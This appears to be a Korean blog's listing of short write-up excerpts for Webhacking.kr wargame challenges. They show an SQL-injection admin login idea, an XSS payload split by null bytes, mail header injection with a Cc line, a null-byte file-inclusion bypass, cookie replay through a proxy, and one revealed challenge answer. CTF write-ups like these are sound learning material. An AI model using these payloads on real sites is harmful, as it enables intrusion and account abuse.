Hacking (65) 썸네일형 리스트형 Webhacking.kr 29 select * from member where no=1 and id="guest" and pw="guest"로 추측할 수 있다. no 가 0이고, admin인 회원으로 로그인 해보자\ select * from member where no=0 and id="admin" and pw="????" Webhacking.kr 34 Javascript Decode 차근차근 보면 된다. 결국 브라우저가 해석하는것이니.%76%61%72%20l%32%3Dwi%6Edow%2Eoper%61%3F%31%3A%30%3B%66un%63tio%6E%20l%33%28%6C%34%29%7B%6C%35%3D%2F%7Aa%2Fg%3B%6C%36%3DSt%72%69ng%2Efro%6D%43%68arC%6Fde%28%30%29%3Bl%34%3Dl%34%2Ereplace%28l%35%2Cl%36%29%3Bv%61r%20l%37%3Dnew%20%41%72ray%28%29%2Cl%38%3D%5F%31%3Dl%34%2El%65ngth%2C%6C%39%2Cl%49%2C%69l%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C%6Ci%3.. Webhacking.kr 51 md5(" ",true);http://bbolmin.tistory.com/77 참고 Webhacking.kr 32 join 버튼을 누르면 내 계정이 랭크에 생성되고, 남을 hit 할 수 있다. 한번밖에 hit 되지 않는 이유는 쿠키에 hit여부를 알리는 flag가 저장되어 있다. 적당히 block하거나, Proxy 등으로 반복 요청하여 100을 만들면 풀림. http://webhacking.kr/challenge/codeing/code5.html GET /challenge/codeing/code5.html?hit=본인계정 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Cookie: PHPSESSID=1 Webhacking.kr 36 view-source:http://webhacking.kr/challenge/bonus/bonus-8/.index.php.swp good! MD5 해쉬를 구해서 정답 인증 ! Webhacking.kr 23 null byte를 통해 문자열 필터링을 우회 http://webhacking.kr/challenge/bonus/bonus-3/index.php?code=%3Cs%00cr%00ipt%3Ealert(1);%3C/s%00cr%00ipt%3E Webhacking.kr 47 파라미터 변조를 통한 Mail Header Injection 입력값에 대한 필터링이 이루어지지 안았을 때 개행문자를 이용admin cc: admin@admin.com Webhacking.kr 25 String 의 끝 Null(%00)을 입력하므로써 문자열 검사 우회 http://webhacking.kr/challenge/bonus/bonus-5/?file=password.php%00 Challenge 25 password is ~~nullbye2~~ 이전 1 2 3 4 5 6 7 8 9 다음